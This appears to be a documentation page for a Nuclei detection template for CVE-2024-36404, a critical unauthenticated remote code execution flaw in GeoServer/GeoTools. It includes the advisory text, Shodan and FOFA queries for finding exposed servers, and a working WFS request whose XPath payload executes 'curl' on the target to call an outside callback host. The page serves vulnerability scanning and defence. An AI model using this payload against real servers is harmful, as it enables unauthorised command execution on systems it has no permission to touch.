GeoServer and GeoTools - Remote Code Execution
ID: CVE-2024-36404
Severity: critical
Author: ritikchaddha
Tags: cve,cve2024,geoserver,rce,unauth,kev
Description
Section titled “Description”GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the gt-complex jar from one’s application. As an example of the impact, application schema datastore would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0. These jars are for download only and are not available from maven central, intended to quickly provide a fix to affected applications.
YAML Source
Section titled “YAML Source”id: CVE-2024-36404
info: name: GeoServer and GeoTools - Remote Code Execution author: ritikchaddha severity: critical description: | GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0. These jars are for download only and are not available from maven central, intended to quickly provide a fix to affected applications. reference: - https://nsfocusglobal.com/remote-code-execution-vulnerability-between-geoserver-and-geotools-cve-2024-36401-cve-2024-36404-notification/ - https://nvd.nist.gov/vuln/detail/CVE-2024-36404 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-36404 cwe-id: CWE-95 metadata: verified: true max-request: 1 vendor: osgeo product: geoserver shodan-query: "Server: GeoHttpServer" fofa-query: - title="geoserver" - app="geoserver" tags: cve,cve2024,geoserver,rce,unauth,kev
http: - raw: - | POST /geoserver/wfs HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml
<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='sf:archsites'/> <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')</wfs:valueReference> </wfs:GetPropertyValue>
matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "http")' - 'contains(body, "java.lang.ClassCastException")' - 'contains(content_type, "application/xml")' - 'status_code == 400' condition: and# digest: 4a0a0047304502205096a8ca6da0e23af2565ae7f915d3ed4ecd656eadb92f499502d0f52793038a022100e7ba491ebced0b459fdd3df1dafb2638177733cb83b76b3b1b66293acbd5616d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36404.yaml"